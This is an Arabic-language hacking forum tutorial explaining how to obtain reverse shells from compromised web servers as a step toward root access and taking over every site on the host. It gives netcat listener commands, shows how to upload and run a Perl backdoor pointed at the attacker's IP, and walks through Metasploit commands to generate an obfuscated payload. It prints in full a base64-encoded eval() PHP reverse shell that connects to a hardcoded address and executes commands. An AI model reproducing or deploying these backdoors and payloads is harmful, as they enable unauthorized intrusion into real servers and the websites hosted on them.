اليوم شفت حالي فاضي قلت خلينا نعمل شرح للاتصال
العكسي بالسيرفرات
من اسمه اتصال عكسي = فتح بورت بكلا الطرفين
الكل متعقد من اشي اسمه اتصال عكسي باختراق الاجهزه
وكمان لاحقنا ع المواقع ايوه لاحقنا
السبب
يمكن الاستغناء عنه بشكل مبدئي لكن ستضيع بسببه الكثير من الدعسات
اكبر اهميه له
الرووت
طبعا الاصل الكل بعرف شو الروت لاني شرحته قبل لكن رح اعمل شرح سريع له
عنا لما نرفع شل بكون عنا هناك صلاحيات
اشهر 3 صلاحيات يوزر ونو بدي والروت اعتقد مضلش غيرهم :23:
ما علينا
الروت هو اعلى صلاحيه ولو حصلا ع صلاحياتته فيك تخترق كل المواقع يلي ع السيرفر وتلعب فيها لعب
زي ما يجي ع بالك
طيب العائق الاول امام الروت
الاتصال العكسي
كيف نتصل اتصال عكسي
الامر بسيط هناك ثلاث طرق سنشرحها مع
volcano
للاتصال العكسي
[hide][/hide]
:666:
للعلم هناك طرق اخرى لكن هذا ما سنشرحه حاليا
نبدا باول طريقه
النت كات netcat
للتحميل
[hide][/hide]
volcano netcat
وانما هو باستخدام back connect
المتواجد بشل سنايبر
بالعاده متواجد اخر شيء
لتحميل شل سنايبر
[hide][/hide]
نشرح اول باول
هاي صوره من الشل
وهي متخصصه بالاتصالات
بهمنا الرقم
1
وهو مكان هدف درسنا الان
ومن هون رح نتصل عكسي بالنت كات
رقم 2
هنا الاي بي الخاص بك
فاذا انت مركب بروكسي بالمتصفح
بليز انتبه لهاي النقطه ولازم تضع الاي بي الحقيقي
لمعرفه الاي بي الحقيقي الخاص بك
canyouseeme.org
رقم 3
هو حج بكون البورت الخاص بالاتصال العكسي
النقطه المهمه
لازم تكون فاتح بورت بجهازك
وانا افضل
9999
لعده اسباب
اولا لمستخدمي نظام ليونكس
البورتات اقل من
1000
غالبا محجوزه
ولمستخدمي ويندوز اايا اشي بصير المهم تفتح بورت وانا رح اشرح ع
9999
:yes:
الرقم 4
خليها مثل ما هي
الرقم 5
هون للاتصال مبدهاش شرح نضغط عليها لما نكون جاهزين
-=-=-=-=====خط فولكانو الاحمر ====-=-=-=-
-=-=-=-=====volcanored====-=-=-=-
طيب هيك شرحنا الشل بقى اشي ثاني لسا ما وصلنا عند الرقم 5 لانو في اشي ناقص
والي هو تجهيز وضبط النت كات
كيد الدخول للنت كات
حمل الملف يلي اعطيتكم اياه فوق
ههههه
مش هسا القى واحد يصير يطلع ع السقف
الان امسك الملف يلي حملته
وحطلي اياه بقرص
c
وفك الضغظ
خلي كل اشي زي ما ارفقته لا تعبني معاك :a43:
يلا نكمل
ندخل للنت كات من خلال شاشه الدوز
شو شاشه الدوز كيف ندخلها
بكل بساطه مليون الف شرح عن دخول شاشه الدوز هسا بلطش لكم اكمن صوره من هالمواقع
هاي الصوره لطش للي بحب الطش
عند الرقم 1
بنضع الامر
cd/
للعوده للجذر
يعني لمسار قرص السي
c:/
النتيجه كما في الناتج عند
الرقم 2
رقم 3
الامر
cd netstat
للدخول لمجلد نت كات
netcat
طيب انتو عارفين من وين اجا هذا المجلد للي طبق حرفي شو شرحت فوق
الي ما طبق حرفي هو حر بس المهم يعرف شو بعمل
مش اطرش بالزفه
رقم 4
ناتج الامر رقم 3 هو الدخول لمجلد
netcat
زي ما شرحنا لكم
الان احنا بداخل النت كات خلينا نبلش لعب
للنت كات اوامر كثيره
منها
nc -vlp port
nc -v -n ip port
وفي كثير اوامر للي بحب يتعمق عمو جوجل ما بقصر معاكم
الان خلينا نشرح امر رقم واحد
الامر رقم واحد وهو
nc -vlp port
يقابله بدرسنا
nc -vlp 9999
اعتقد وضحت اللعبه وما بدها شرح خلص بلاش نشرح
لعيون المبتدئين رح نشرح :Great:
الامر معنات تنصت ع البورت رقم 9999
يعني الان هو بنتظر ايا اتصال خارجي بهذا البورت
لحتى يلبي الطلب والاتصال
:P
طيب نسلخ الوضع صوره
زي ما انت شايف يا خوليو
النت كات عم يتنصت ع العالم
بده يستقبل ايا اتصال لحتى يربطنا معاه
الامر الثاني مشابه ما في داعي نشرحه
يقوم بنفس الوظيفه بس خلينا نحلل الامر
nc -v -n ip port
الان نستبدل
ip = رقم اي بي السيرفر
port = الي فتحناه بالسيرفر
يعني بمثالنا رح يكون هيك
nc -v -n 194.0.252.205 9999
طبعا
194.0.252.205
هذا اي بي السيرفر
==
الان خلينا نركز ع هاي النقطه المهمه
احنا ضبطنا الاعدادات الشل ولسا ما ضغطنا ع الرقم خمسه
ايا رقم خمسه ارجع عند خط فولكانو الاحمر اعلا
خط زي هذا
-=-=-=-=====خط فولكانو الاحمر ====-=-=-=-
اوكي تمام
الان احنا عاملين تنصت ومجهزين الاوامر ع الشل
بقى ترتيب الخطوات
اول شيء تاكد انه النت كات كما بالصوره
الان اعمل اتصال بالرقم خمسه
ولازم يطلع معاك كذا
ورقمت لكم الترتيب ورح نعيده
زي ما انتو
شايفين بالمربع رقم 4 كيف لما صار اتصال
ع فكره الشل فيه اكثر من طريقه للاتصال
العكسي
ويفضل ما تياس عند وحده جرب حظك فيهم كلهم
ايوه ممكن وحده تنفع والثانيه لع
:23:
الان نشرح الترتيب حسب هاي الصوره
برقم 1
ضبطنا النت كات وخليناه يتنصت ع البورت
9999
برقم 2
ضبطنا بورت الشل وخليناه
9999
رقم 3
بدا الاتصال
رقم اربعه المربع الكبير هذا
-------
ملاحظه بالشل يلي ارفقته هناك اكثر من اسلوب اتصال
اذا ما نجح حسب الشرح جرب الاساليب الاخرى ممكن تنجح
الشغله مع التجربه اشبه بالحظ :666:
وهيك خلصنا من القسم الاول من الدرس
لي 3 ساعات عليه
روحو اشربو كاسه نسكفيه وتعالو زقت انا برب
----------------=نهايه القسم الاول وبدايه القسم الثاني الاتصال عبر الباك دور كونكت=----------------- --------------=backdoor.pl=------------
اول سؤال رح تقلي شو الباك دور ويلف براسك اسئله غريبه مبتخطرش ع عالم الذره
حب انت لما تتعقد من اشي
اعتبر حالك فاهمه ولو حد سائلك اكتفي بمعلوماتك يلي بتعرفها رح تشعر انك فاهمه كويس ورح تفهمه فيما بعد
هذا قانوني بالتعلم وصدقوني اني لازلت اتبعه
لتحميل ملف الباك دور
يا نور العين هيني حملته شو بشتغل هذا
هذا اسمه الباك دور يعني بشتغل بدال الشل يلي اعطيتكم اياه
بنرفعه ع الشل
شوف معي
رقم 1
شوف يا غالي
اول شيء رفعنا ملف الباك دور ع السيرفر
رقم 2
ادخلنا هذا الامر
chmod 755 backdoor.pl
خمسين سؤال صارو براسك صبر بدي اشرح كل اشي
اول شيء
ملف الباك دور مكتوب بلغه بريل
يعني اذا السيرفر ما بشغل بريل انسى موضوع الباك دور
ومشكله تشغيل البريل هاي بتحطها ع جنب جالسين خبراء الهكر يعملو حلول ولكن فيك تقول
شبه ناجحه حلولهم
--------
طيب حلو عرفنا البريل وشو قصه الامر ما فهمناها
حب الامر
chmod = تغير التصريح
يعني بتغير تصريح ملف = بتغير صلاحيات الاخرين بالتحكم بالملف وما شابه
ما تعقد حالك ارجع لقانوني اعتبر حالك فاهم
طيب التصريح الجديد للباك دور هو
755
هذا الرقم له معنى
شوف بالصوره
ع يسار اسم الباك دور رح تلقى هذا الرمز
-rw-r--r--
لكن بعد اعطاء التصريح بصير كذا الرمز
-rwxr-xr-x
هيك احنا غيرنا صلاحيات الوصول للملف
وبالتالي صار الباك دور جاهز
طيب ايش بتطلب مني الان
مو اشي كثير
شوف يا غالي
اضبط النت كات ع التنصت كما فعلنا سابقا
احصل ع الاي بي الخاص بك من خلال موقع
canyouseeme.org
او ايا موقع اخر
لان كل اشي جاهز خلينا نفرجيكم شو رح نعمل
تبع معي يا حب هاي الصوره مو مثل يلي قبلها
ركز كويس
عند رقم 1
شوف كيف صار بالتصريح الخاص بالباك دور
عند رقم 2
هذا امر تشغيل الباك دور
رح نشرحه ركز معي
الان انت عامل تنصب بالنت كات
ومصرح الباك دور
وباقي عليك تعطي امر تشغيل الباك دور
حلو
واضغط انتر ورح يتصل معاك
--
حاسس حالي عكيت كثير خلينا نفصل الامر هسا وبعد نرتب كل اشي ورا بعض
الامر
perl backdoor.pl 23.186.185.74 9999
نبدا باشرح
perl هذا امر تشغيل ايا ملف مكتوب بلغه بريل
backdoor.pl
اسم ملف الباك دور
الاي بي تاعي
23.186.185.74
فيك تطول الاي بي تاعك من موقع
canyouseeme.org
حاسس حالي عامل له دعايه قد ما عدته
وشاب راسي
احلى اشي يطلع لي واحد يسال لشو هذا الموقع
:a09::a23:
ضل اخر اشي
9999
هذا البورت
بدوش شرح شارح حاله
طيب الان كل اشي جاهز خلينا نرتب الخطوات مع بعض
رقم 1
التنصت بالنت كات
رقم 2
رفع وتصريح الباك دور
رقم 3
ضغط امر التشغيل للباك دور
طيب يا زين الاحترام وايش بعد
الان خلينا نسلخ صوره للناتج خليكم تتفرجو كيف بصير بالنت كات لما يتصل بالباك دور
:Great:
يلا هيك خلصنا الدرس الثاني
ومده كتابته كمان 2 ساعه
ربنا بعين كله فداكم
بندخل بالدرس الثالث
:a32:
اول شيء
روح اعمل كاسه قهوه احسب حسابي لاني بلشت انعس
:37:
يلا ندخل بصلب الموضوع
------------------الاتصال العكسي بالسيرفر بالاستعانه بالشل كود-------------
شكر للاخ
his0k4
هو يلي حل لي مشكلتي بعمل الشل كود بكلمتين بسيطات
ولهذا السبب انا نزلت الشرح
يعني قبل لا اشوف ردود شكر لي اشكروه هو اولا
والله احلى هيسوكا ازكى من العسل
:a15:
يلا نلعب
اول شيء
قبل لا ندخل بالموضوع كثير رح يسال شو الشل كود وشو شو
ليش الشل ليش
عشان الشل عشان
:a20:
يعني القصد لازم يكون عندك شويه خلفيه عن الموضوع
عندك دروس المجهول عن الشل كود +
دروس الاخ
data$hack
والنت مليان دورات للميتاسبلوت
كل يلي بدك اياه شويه خلفيه بسيطه
=========
نبدا ع بكره الله
نفستح الميتاسبلوت
وندخل ع الكاونسل
console
الان بكل بساطه ننفذ الاوامر التاليه ورا بعض
هذا اقتباس للاوامر من كلام الاخ هيسوكا
والان خلينا نشرح للاوامر بالتفصيل المميت
مع الصور
اول شيء الامر
use payload/php/reverse_php
هذا الامر لاستخدام البايلود المتخصص بالاتصال العكسي
خلينا نسلخ صوره عشان تفهمو اكثر
الخط الاصفر تحت الامر الي ادخلناه
وزي ما شفت الميتا اقلعت ع اساس البايلود يلي وضعناه
يلا نتابع
الامر الثاني
set LHOST 92.23.112.254
طبعا
92.23.112.254
هذا الاي بي تاعي وبتغيره للاي بي تاعك
ممم بجوز قلت لكم كيف والله مو ذاكر :P
نسلخ صوره للامر
يلا وضعنا الاي بي تمام هيك
الان نضع البورت
set LPORT 9999
بف والله حاسس حالي زايدها بالصور
بس لعيونكم يهون الغالي
بقى علينا امر
التشفير
set ENCODER php/base64
اخترنا نوع التشفير
base64
نسلخكم صوره
زي ما انتو شايفين الان تم التشفير بنجاح
بقى الخطوه الي يجهلها الكثير وهي كيفيه استخراج محتوى البايلود
بكل بساطه
هذا الامر
generate -t raw
بقوم بعرض محتوى البايلود
يلان ندخله
كذا تم انشاء الشل كود بنجاح
وهو مشفر زي ما قلنا لكم
الان باقي خطوه اخيره وبصير الشل كود جاهز للعمل :icon555:
ايران خلصت ننوي واحنا بعدنا بنعمل شل كود
ربنا بعين
نحدد الكلام يلي انا واضعه بمربع اصفر
ونضعه بين هاي الداله
طبعا يلي بهم شويه برمجه فهم ايش عملنا وبالتالي
مش رح يكمل قرائه :yes:
شايفين اهميه البرمجه
الداله يلي عملناها الاقواس وعلامه الاسفهام
ما هي الا مجرد
بدايه كود php
ونهايته
يعني التكمله انعرفت اكيد صح
لع مش صح في ناس بعدها ما يعرفو التكمله
حب رح يصير عندك الكود زي هذا
كود PHP:
[center]<?
eval(base64_decode(CQkkaXBhZGRyPWxvbmcyaXAoMTU2MDExMzQwNik7CgkJJHBvcnQ9OTk5OTsKCQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkZGlzPUBpbmlfZ2V0KCdkaXNhYmxlX2Z1bmN0aW9ucycpOwoJCQlpZighZW1wdHkoJGRpcykpewoJCQkJJGRpcz1wcmVnX3JlcGxhY2UoJy9bLCBdKy8nLCAnLCcsICRkaXMpOwoJCQkJJGRpcz1leHBsb2RlKCcsJywgJGRpcyk7CgkJCQkkZGlzPWFycmF5X21hcCgndHJpbScsICRkaXMpOwoJCQl9ZWxzZXsKCQkJCSRkaXM9YXJyYXkoKTsKCQkJfQoJCQkKCgkJaWYoIWZ1bmN0aW9uX2V4aXN0cygnYkRuaERmbScpKXsKCQkJZnVuY3Rpb24gYkRuaERmbSgkYyl7CgkJCQlnbG9iYWwgJGRpczsKCQkJCQoJCQkkYz0kYy4iIDI.chr(43).JjFcbiI7CgkJCSRNR2pwbj0naXNfY2FsbGFibGUnOwoJCQkkZHpPVT0naW5fYXJyYXknOwoJCQkKCQkJaWYoJE1HanBuKCdwYXNzdGhydScpYW5kISRkek9VKCdwYXNzdGhydScsJGRpcykpewoJCQkJb2Jfc3RhcnQoKTsKCQkJCXBhc3N0aHJ1KCRjKTsKCQkJCSRvPW9iX2dldF9jb250ZW50cygpOwoJCQkJb2JfZW5kX2NsZWFuKCk7CgkJCX1lbHNlCgkJCWlmKCRNR2pwbignZXhlYycpYW5kISRkek9VKCdleGVjJywkZGlzKSl7CgkJ.CQkkbz1hcnJheSgpOwoJCQkJZXhlYygkYywkbyk7CgkJCQkkbz1qb2luKGNocigxMCksJG8pLmNocigxMCk7CgkJCX1lbHNlCgkJCWlmKCRNR2pwbigncHJvY19vcGVuJylhbmQhJGR6T1UoJ3Byb2Nfb3BlbicsJGRpcykpewoJCQkJJGhhbmRsZT1wcm9jX29wZW4oJGMsYXJyYXkoYXJyYXkocGlwZSxyKSxhcnJheShwaXBlLHcpLGFycmF5KHBpcGUsdykpLCRwaXBlcyk7CgkJCQkkbz1OVUxMOwoJCQkJd2hpbGUoIWZlb2YoJHBpcGVzWzFdKSl7CgkJCQkJJG8uPWZyZWFkKCRwaXBlc1sxXSwxMDI0KTsKCQkJCX0KCQkJCUBwcm9jX2Nsb3NlKCRoYW5kbGUpOwoJCQl9ZWxzZQoJCQlpZigkTUdqcG4oJ3NoZWxsX2V4ZWMnKWFuZCEkZHpPVSgnc2hlbGxfZXhlYycsJGRpcykpewoJCQkJJG89c2hlbGxfZXhlYygkYyk7CgkJCX1lbHNlCgkJCWlmKCRNR2pwbignc3lzdGVtJylhbmQhJGR6T1UoJ3N5c3RlbScsJGRpcykpewoJCQkJb2Jfc3RhcnQoKTsKCQkJCXN5c3RlbSgkYyk7CgkJCQkkbz1vYl9nZXRfY29udGVudHMoKTsKCQkJCW9iX2VuZF9jbGVhbigpOwoJCQl9ZWxzZQoJCQlpZigkTUdqcG4oJ3BvcGVuJylhbmQhJGR6T1UoJ3BvcGVuJywkZGlzKSl7CgkJCQkkZnA9cG9wZW4oJGMscik7CgkJCQkkbz1OVUxMOwoJCQkJaWYoaXNfcmVzb3VyY2UoJGZwKSl7CgkJCQkJd2hpbGUoIWZlb2Y.oJGZwKSl7CgkJCQkJCSRvLj1mcmVhZCgkZnAsMTAyNCk7CgkJCQkJfQoJCQkJfQoJCQkJQHBjbG9zZSgkZnApOwoJCQl9ZWxzZQoJCQl7CgkJCQkkbz0wOwoJCQl9CgkJCgkJCQlyZXR1cm4gJG87CgkJCX0KCQl9CgkJJG5vZnVuY3M9J25vIGV4ZWMgZnVuY3Rpb25zJzsKCQlpZihpc19jYWxsYWJsZSgnZnNvY2tvcGVuJylhbmQhaW5fYXJyYXkoJ2Zzb2Nrb3BlbicsJGRpcykpewoJCQkkcz1AZnNvY2tvcGVuKCRpcGFkZHIsJHBvcnQpOwoJCQl3aGlsZSgkYz1mcmVhZCgkcywyMDQ4KSl7CgkJCQkkb3V0ID0gJyc7CgkJCQlpZihzdWJzdHIoJGMsMCwzKSA9PSAnY2QgJyl7CgkJCQkJY2hkaXIoc3Vic3RyKCRjLDMsLTEpKTsKCQkJCX0gZWxzZSBpZiAoc3Vic3RyKCRjLDAsNCkgPT0gJ3F1aXQnIHx8IHN1YnN0cigkYywwLDQpID09ICdleGl0JykgewoJCQkJCWJyZWFrOwoJCQkJfWVsc2V7CgkJCQkJJG91dD1iRG5oRGZtKHN1YnN0cigkYywwLC0xKSk7CgkJCQkJaWYoJG91dD09PWZhbHNlKXsKCQkJCQkJZndyaXRlKCRzLCRub2Z1bmNzKTsKCQkJCQkJYnJlYWs7CgkJCQkJfQoJCQkJfQoJCQkJZndyaXRlKCRzLCRvdXQpOwoJCQl9CgkJCWZjbG9zZSgkcyk7CgkJfWVsc2V7CgkJCSRzPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7CgkJCUBzb2NrZXRfY29.ubmVjdCgkcywkaXBhZGRyLCRwb3J0KTsKCQkJQHNvY2tldF93cml0ZSgkcywic29ja2V0X2NyZWF0ZSIpOwoJCQl3aGlsZSgkYz1Ac29ja2V0X3JlYWQoJHMsMjA0OCkpewoJCQkJJG91dCA9ICcnOwoJCQkJaWYoc3Vic3RyKCRjLDAsMykgPT0gJ2NkICcpewoJCQkJCWNoZGlyKHN1YnN0cigkYywzLC0xKSk7CgkJCQl9IGVsc2UgaWYgKHN1YnN0cigkYywwLDQpID09ICdxdWl0JyB8fCBzdWJzdHIoJGMsMCw0KSA9PSAnZXhpdCcpIHsKCQkJCQlicmVhazsKCQkJCX1lbHNlewoJCQkJCSRvdXQ9YkRuaERmbShzdWJzdHIoJGMsMCwtMSkpOwoJCQkJCWlmKCRvdXQ9PT1mYWxzZSl7CgkJCQkJCUBzb2NrZXRfd3JpdGUoJHMsJG5vZnVuY3MpOwoJCQkJCQlicmVhazsKCQkJCQl9CgkJCQl9CgkJCQlAc29ja2V0X3dyaXRlKCRzLCRvdXQsc3RybGVuKCRvdXQpKTsKCQkJfQoJCQlAc29ja2V0X2Nsb3NlKCRzKTsKCQl9Cg));
?>
[/center]
طيب تمام صار عنا والتكمله
نحفظه داخل ملف بامتداد
php
شيء طبيعي مادام بلغه
php
رح نحفظه بامتداد
php
خلينا نسميه مثلا
shx.php
حلو يلا نرفعه ع الشل
رح تقلي طيب يا غالي رفعناه
انتو الغالين
بقى ايش يا حلوين
ممممممممممم
نبلش تنصت بالنت كات زي التالي
وبعدها نروح للشل
ندخل ع الملف
shx.php
يلي هو عباره عن الشل كود الخاص فينا
يعني ندخل عليه كذا
xxxxxxxx.com/shx.php
وشوف ايش رح يطلع بالنت كات
رح تلقى انه تم
الاتصال بنجاح
:sossa:
طيب الان رح يخطر ببالك سؤال خطير
ليش كل هاي الغلبه
اما طريقه وحده تنفع + انيه الافضل ؟
بنقلك بكل بساطه
لاحظ الطريقه الاولى هي الاسهل
ثم الثانيه ثم الثالثه
اما من حيث القوه
فالطريقه الاخيره هي الاقوى
وانا ما بستخدمها الا لما اكون بسيرفر عنيد وراسه قاسي
وجلده مخطه خميله
وكذا انتهى الشرح
اهداء خاص ل
الزعيم
his0k4
MadjiX
red virus
P4L-T3RRORIST
claw الله يوفقك بدراستك
Mr.DraGoN
DR.K!lleR
واهداء لجميع اعضاء العناكب والهكر العربي وغزه هكر
وبكذا انهينا القنبه السادسه وجاري صناعه قنبله جديده
هذا الدرس تم تحت رعايه
فريق
kala$nikoV
تحياتي
VoLc4n0
stone loVe
Fla$h
معا لنشر العقول الالكترونيه
avp hghjwhg hgu;sd fhur] hgsdvtvhj feghe 'vr ,hghjwhg dk[p fh`k hggi